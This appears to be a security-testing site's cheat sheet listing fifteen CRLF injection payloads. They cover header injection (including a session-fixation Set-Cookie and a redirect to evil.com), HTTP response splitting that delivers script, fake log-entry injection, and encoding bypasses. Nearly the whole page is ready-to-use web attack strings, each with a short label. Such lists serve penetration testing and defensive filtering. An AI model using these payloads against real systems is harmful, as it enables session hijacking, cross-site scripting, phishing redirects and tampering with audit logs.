CRLF Injection Cheat Sheet

CRLF injection payloads for HTTP response splitting, header injection, and log poisoning. (15 payloads)

Header Injection

(5)

%0d%0aX-Injected: true

Inject custom header

%0d%0aSet-Cookie: session=attacker

Session fixation via Set-Cookie

%0d%0aLocation: https://evil.com

Redirect via Location header

%0aX-Forwarded-For: 127.0.0.1

LF-only header injection

\r\nX-Injected: true

Raw CRLF (if unescaped)

Response Splitting

(2)

%0d%0a%0d%0a<html><script>alert(1)</script></html>

Full response body injection (XSS)

%0d%0aContent-Length: 0%0d%0a%0d%0aHTTP/1.1 200 OK%0d%0aContent-Type: text/html%0d%0a%0d%0a<script>alert(1)</script>

Second response injection

Log Poisoning

(2)

%0d%0a[INFO] Admin login successful

Fake log entry injection

%0d%0a[2024-01-01] Authorized access granted

Timestamped fake log entry

Encoding Variations

(6)

%0d%0a

URL-encoded CRLF

%0a

URL-encoded LF only

%0d

URL-encoded CR only

%E5%98%8A%E5%98%8D

Unicode CRLF bypass

%25%30%61

Double-encoded LF

%%0d0a

Partial double-encoding

ShareX LinkedIn Reddit

Level up your security testing

Install the CLI

npx payload-playground

Explore All Tools

Encoding, hashing, JWT & more

Browse Cheat Sheets

Quick-reference payload guides

Related Generators

CRLF Injection HTTP Request Smuggling

Related Cheat Sheets

XSS Cheat Sheet Command Injection Cheat Sheet

$loading...